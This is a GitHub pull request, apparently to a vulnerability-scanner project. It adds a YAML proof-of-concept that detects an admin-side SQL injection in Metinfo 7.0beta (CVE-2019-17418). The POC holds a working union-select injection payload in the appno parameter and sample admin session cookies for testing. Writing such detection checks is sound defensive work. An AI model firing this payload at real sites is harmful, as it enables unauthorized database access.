### PR TITLE
添加Metinfo7.0beta后台SQL注入漏洞POC(cve-2019-17418)

### DIFF
--- a/pocs/metinfo-cve-2019-17418-sqli.yml
+++ b/pocs/metinfo-cve-2019-17418-sqli.yml
@@ -1,14 +1,14 @@
 name: poc-yaml-metinfo-cve-2019-17418-sqli
 set:
-  r1: randomInt(800000000, 1000000000)
-  r2: randomInt(800000000, 1000000000)
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
 rules:
   - method: GET
     path: >-
-      /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=fuckyou&appno=0+union+select+concat({{r1}},{{r2}}),1--+&site=admin
+      /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=fuckyou&appno=0+union+select+{{r1}}*{{r2}},1--+&site=admin
     follow_redirects: true
     expression: |
-      status==200 && body.bcontains(bytes(string(r1)+string(r2)))
+      status==200 && body.bcontains(bytes(string(r1*r2)))
 detail:
   author: JingLing(https://hackfun.org/)
   metinfo_version: 7.0.0beta

--- a/pocs/metinfo-cve-2019-17418-sqli.yml
+++ b/pocs/metinfo-cve-2019-17418-sqli.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-metinfo-cve-2019-17418-sqli
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    path: >-
+      /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=fuckyou&appno=0+union+select+concat({{r1}},{{r2}}),1--+&site=admin
+    follow_redirects: true
+    expression: |
+      status==200 && body.bcontains(bytes(string(r1)+string(r2)))
+detail:
+  author: JingLing(https://hackfun.org/)
+  metinfo_version: 7.0.0beta
+  links:
+    - https://github.com/evi1code/Just-for-fun/issues/2


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
检测Metinfo7.0beta后台SQL注入漏洞
## 测试环境
下载安装即可：https://u.mituo.cn/api/metinfo/download/7.0.0beta

## 备注
由于是漏洞只能在后台触发，测试时在config.yaml http节cookies添加类似以下键值，至少需要met_auth和met_key键值。
```yaml
http:
  ...
  cookies: # 每个请求预置的 cookie 值，效果上相当于添加了一个 Header: Cookie: key=value
    met_auth: 8a86lVyRH0ZAjHOQo8rukMv62ItWO1c%2FGKFjJelpRV3r58cBubkUoxpjTLrvct1T6YG7HN%2ByMmaZFMdDWstUvBZH
    met_key: RCVQcCW
```
本地测试截图：
![image](https://user-images.githubusercontent.com/24275308/66676434-084ea000-ec9a-11e9-9e01-b42653e14836.png)

